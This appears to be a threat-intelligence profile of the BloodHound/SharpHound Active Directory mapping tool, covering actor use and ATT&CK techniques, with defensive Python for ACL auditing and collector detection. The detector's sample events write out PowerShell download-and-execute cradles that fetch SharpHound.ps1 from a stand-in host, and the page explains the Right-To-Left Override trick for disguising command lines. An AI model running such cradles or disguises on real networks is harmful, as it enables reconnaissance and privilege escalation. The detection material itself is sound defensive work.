BloodHound
BloodHound is an Active Directory reconnaissance and relationship-mapping tool; SharpHound is its data-collection ingestor. It is used to enumerate domain users, domain administrator accounts, local and domain groups, user sessions, domain computers including domain controllers, domain trusts, and Group Policy-derived local administrator relationships. The collector gathers Active Directory data through PowerShell and .NET API calls, and SharpHound can compress the collected data into a ZIP archive written to disk. The cited reporting also notes that BloodHound can reveal which accounts hold replication-related privileges in Active Directory.
BloodHound is widely used in penetration testing and by internal security teams, but the cited reporting also documents repeated use by threat actors during real intrusions for network reconnaissance, Active Directory mapping, and identifying privilege-escalation and lateral-movement paths. Reported examples include Russian state-sponsored actors targeting U.S. cleared defense contractors, attackers in the Capita 2023 intrusion, UNC2447 activity, Play, and other intrusion sets using BloodHound alongside tools such as Cobalt Strike, Mimikatz, PsExec, AdFind, and PowerView. In several cited cases, BloodHound use occurred before ransomware deployment or during broader post-compromise discovery.
Observed execution patterns in the cited reporting include PowerShell-based invocation of SharpHound, including download cradles that retrieve SharpHound.ps1 from public repositories and execute Invoke-BloodHound from memory or from local disk. The reporting highlights detection opportunities around SharpHound/BloodHound LDAP query patterns, anomalous service principal name (SPN) requests of the kind associated with Kerberoasting, and large-scale Active Directory enumeration. High-confidence behavioral indicators mentioned include PowerShell commands downloading SharpHound.ps1, Invoke-BloodHound execution, LDAP-based Active Directory collection, and SharpHound-produced ZIP archives containing collected directory data.
Groups observed using it
5 distinct threat actors attributed by public researchers.
Prominent among the other tools used by Twelve are Cobalt Strike, Mimikatz, Chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner, and PsExec for credential theft, discovery, network mapping, and privilege escalation.
During an intrusion, tools such as Cobalt Strike, PowerShell Empire, Bloodhound, PSExec... are used for network discovery and traversal, privilege escalation, staging, and ransomware deployment.
"SharpHound... for BloodHound (an open-source Active Directory analysis tool used to identify attack paths in AD environments)."
...UNC2447 has been observed using the following tools: ADFIND, BLOODHOUND...
Techniques & procedures
19 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Source reporting repeatedly states that threat actors 'obtained,' 'acquired,' or 'used' publicly available, open-source, legitimate, or modified tools such as Mimikatz, Cobalt Strike, PsExec, Empire, Impacket, and many others.
Execution
1 technique
Source reporting repeatedly describes threat actors and malware using PowerShell scripts and commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
Privilege Escalation
3 techniques
There are also built-in escalation path queries, such as built-in queries for Active Directory Certificate Services (ADCS) privilege escalation techniques.
Access Control Lists (ACL) misconfiguration is one of the most common issues Microsoft Incident Response finds in Active Directory environments... These attack paths create an escalation path from a low privileged user to total domain control.
Some of the typically misused rights include: ForceChangePassword ... GenericAll ... GenericWrite ... WriteOwner ... WriteDacl ... Self ... These things can have critical impact and often times lead to Domain Admin privileges.
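The two excerpts above describe ACL misconfiguration as a chain: a low-privileged principal holds one of the listed rights over an object, which in turn holds rights over something more valuable, until the chain reaches domain control. The following is an added example, not code from BloodHound, SharpHound, Microsoft or any source quoted on this page. It audits a set of access-control entries for exactly the rights the excerpt names and then walks the resulting graph so a defender can see which edge to cut. The ACE tuples, the group memberships, the field names and the set of Tier-0 group names are constructed assumptions for the demo, not a real directory export.

```python
"""Audit AD access-control entries for the rights the excerpt above lists and
trace whether they chain into domain control.

Added example for this page; not code from BloodHound, SharpHound or Microsoft.
The ACE tuples and memberships below are constructed sample data, and the
group names chosen as Tier-0 targets are an assumption for the demo.
"""
from collections import deque

# Rights named in the excerpt, with why a defender should care.
RISKY_RIGHTS = {
    "GenericAll": "full control of the target object",
    "GenericWrite": "can write most attributes (e.g. group membership, scripts)",
    "WriteOwner": "can take ownership and then grant itself any right",
    "WriteDacl": "can rewrite the target's ACL",
    "ForceChangePassword": "can reset the target's password without knowing it",
    "Self": "validated write, e.g. adding itself to the target group",
}
# Principals that mean 'almost everyone'; rights granted to them are the worst case.
BROAD_PRINCIPALS = {"Everyone", "Authenticated Users", "Domain Users", "Domain Computers"}
# Assumed Tier-0 objects; rights over these are direct domain control.
TIER0 = {"Domain Admins", "Enterprise Admins", "Administrators", "Domain Controllers"}

# Constructed sample ACEs: (trustee, right, target).
SAMPLE_ACES = [
    ("helpdesk", "ForceChangePassword", "svc_backup"),
    ("svc_backup", "GenericWrite", "Domain Admins"),
    ("Authenticated Users", "WriteDacl", "OU=Workstations"),
    ("Domain Admins", "GenericAll", "Domain Admins"),   # expected default, not a finding
    ("svc_backup", "ReadProperty", "OU=Servers"),        # harmless right, ignored
]
# Constructed sample group memberships: (member, group).
SAMPLE_MEMBERSHIPS = [("alice", "helpdesk")]


def audit_aces(aces, tier0=TIER0):
    """Return one finding per risky ACE held by a non-Tier-0 trustee."""
    findings = []
    for trustee, right, target in aces:
        if right not in RISKY_RIGHTS or trustee in tier0:
            continue
        severity = "critical" if (trustee in BROAD_PRINCIPALS or target in tier0) else "high"
        findings.append({"trustee": trustee, "right": right, "target": target,
                         "severity": severity, "why": RISKY_RIGHTS[right]})
    return findings


def build_graph(aces, memberships):
    """Directed graph: MemberOf edges plus one edge per risky ACE."""
    graph = {}
    for member, group in memberships:
        graph.setdefault(member, []).append((group, "MemberOf"))
    for trustee, right, target in aces:
        if right in RISKY_RIGHTS:
            graph.setdefault(trustee, []).append((target, right))
    return graph


def shortest_path(graph, start, goal):
    """BFS from a principal to a target; returns [(node, edge_label), ...] or None.
    This is the 'escalation path' the excerpt describes, computed so it can be cut."""
    queue = deque([(start, [(start, None)])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for nxt, label in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(nxt, label)]))
    return None


if __name__ == "__main__":
    for f in audit_aces(SAMPLE_ACES):
        print(f["severity"].upper(), f["trustee"], f["right"], f["target"], "-", f["why"])
    path = shortest_path(build_graph(SAMPLE_ACES, SAMPLE_MEMBERSHIPS), "alice", "Domain Admins")
    print(" -> ".join(f"{n} [{e}]" if e else n for n, e in path))
```

On the sample data the audit reports three findings and the path search shows that alice reaches Domain Admins in three hops through a help-desk password reset and a service account with GenericWrite on the group. Removing either of those two ACEs breaks the chain, which is the remediation decision this kind of audit is meant to support.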
Stealth
2 techniques
"You could detect it with traffic to 9389 (ADWS) but there's an even bigger problem there, all of RSAT uses ADWS. So sysadmins doing normal operations would trigger false positives."
Another deception example is the use of the infamous Right-To-Left Override (RLO) character... Invoking a PowerShell command that downloads and executes BloodHound, with argv[0] containing the RLO character \u202E, makes it much harder to understand what is going on when looking at the reported command line.
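The summary at the top of this page lists the high-confidence indicators (SharpHound.ps1 retrieval, Invoke-BloodHound execution, SharpHound ZIP output), and the Stealth note above explains why a Right-To-Left Override in the command line defeats naive matching. The following is an added example, not code from BloodHound, SharpHound or any vendor, that applies those indicators to process-creation and file-creation telemetry after stripping bidi control characters. The event field names, the default ZIP naming pattern and the four sample events are constructed assumptions for the demo, not real logs.

```python
"""Flag SharpHound / BloodHound collector activity in process and file telemetry.

Added example for this page; it is not code from BloodHound, SharpHound or any
vendor. Event field names (Image, CommandLine) and the sample events below are
constructed assumptions, not real telemetry.
"""
import re

# Unicode bidirectional controls. U+202E (RLO) is the one the Stealth note
# describes; the others are included because they distort display the same way.
BIDI_CONTROLS = frozenset(
    "\u200e\u200f\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069"
)

# Indicators named on the page plus the generic PowerShell download primitives
# a cradle needs. Each is matched against the *normalized* command line.
INDICATORS = [
    ("sharphound_script", re.compile(r"sharphound\.ps1", re.I)),
    ("invoke_bloodhound", re.compile(r"invoke-bloodhound", re.I)),
    ("sharphound_binary", re.compile(r"sharphound\.exe", re.I)),
    ("download_cradle", re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression",
        re.I)),
]

# Assumed default SharpHound output name: <14-digit timestamp>_BloodHound.zip.
# Operators can rename it, so a non-match is not evidence of absence.
ZIP_NAME = re.compile(r"^\d{14}_BloodHound\.zip$", re.I)


def normalize_cmdline(cmdline: str) -> tuple:
    """Strip bidi control characters so an overridden argv[0] cannot hide
    substrings from the regexes. Returns (clean_text, had_bidi)."""
    had_bidi = any(ch in BIDI_CONTROLS for ch in cmdline)
    clean = "".join(ch for ch in cmdline if ch not in BIDI_CONTROLS)
    return clean, had_bidi


def analyze_event(event: dict) -> dict:
    """Score one process-creation event. Levels follow the page's own ranking:
    SharpHound.ps1 retrieval or Invoke-BloodHound is high confidence; a bare
    download cradle is too common (installers, admin scripts) to alert on alone."""
    cmd, had_bidi = normalize_cmdline(event.get("CommandLine", ""))
    hits = [name for name, rx in INDICATORS if rx.search(cmd)]
    if had_bidi:
        hits.append("bidi_override_in_cmdline")
    if "invoke_bloodhound" in hits or "sharphound_script" in hits:
        level = "high"
    elif "sharphound_binary" in hits:
        level = "medium"
    else:
        level = "none"
    return {"image": event.get("Image"), "level": level,
            "indicators": sorted(hits), "normalized": cmd}


def is_sharphound_output(filename: str) -> bool:
    """True if a created file matches the assumed default collector ZIP name."""
    return ZIP_NAME.match(filename) is not None


# Constructed sample events (not real logs). The second carries an RLO in argv[0].
SAMPLE_EVENTS = [
    {"Image": "powershell.exe",
     "CommandLine": "powershell.exe -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/SharpHound.ps1'); Invoke-BloodHound\""},
    {"Image": "powershell.exe",
     "CommandLine": "\u202epowershell.exe -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/SharpHound.ps1')\""},
    {"Image": "powershell.exe",
     "CommandLine": "powershell.exe -Command \"Get-ADUser -Filter * -Properties memberOf\""},
    {"Image": "powershell.exe",
     "CommandLine": "powershell.exe -c \"Invoke-WebRequest https://example.invalid/setup.msi"
                    " -OutFile C:\\Temp\\setup.msi\""},
]


def run_all(events=SAMPLE_EVENTS) -> list:
    """Analyze every sample event and return the results in order."""
    return [analyze_event(e) for e in events]


if __name__ == "__main__":
    for r in run_all():
        print(r["level"].upper(), r["indicators"])
```

The fourth sample shows the caveat the page's ADWS quote makes in a different form: a download primitive on its own is routine administration and scores "none", so the cradle indicator only adds weight when it co-occurs with a SharpHound-specific string. The RLO sample still scores "high" because matching runs on the normalized text, and the bidi indicator is surfaced separately so an analyst sees that the raw command line was disguised.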
Defense Impairment
1 technique
Discovery
12 techniques
In BOFHound output mode, all attributes for every object are parsed and outputted to BOFHound format... Computers collection
Further investigation revealed a Git repository that contains a framework of tools and scripts that align with two components: an automated Active Directory (AD) discovery panel
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking admin status, and enumerating user sessions.
For four days – March 24-28 – they conducted network reconnaissance using Cobalt Strike and Bloodhound before Capita detected three compromised staff devices and contained them.
System Network Connections Discovery [T1049]: A common tool used for this network enumeration tactic is Bloodhound.
Users collection, Groups collection, Computers collection, Trusts collection, OU collection, GPO collection, Certificate template collection
GeminiDuke focuses primarily on gathering details about the victim’s computer’s configuration.
After gaining access to networks, the threat actors used BloodHound to map the Active Directory.
Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack.
The threat actor executed Bloodhound to map out the AD environment.
Recent activity
52 sources tracked across advisories, community write-ups, and news.
Referenced through detection names indicating use or testing of Active Directory discovery and attack-path mapping capabilities within the broader framework.
An Active Directory reconnaissance and attack-path mapping tool referenced via detections tied to this threat activity.
Explicitly described as a tool for Active Directory mapping used during intrusions.
BloodHound is discussed as an attack-path and privilege-analysis tool used to identify accounts with replication rights in Active Directory.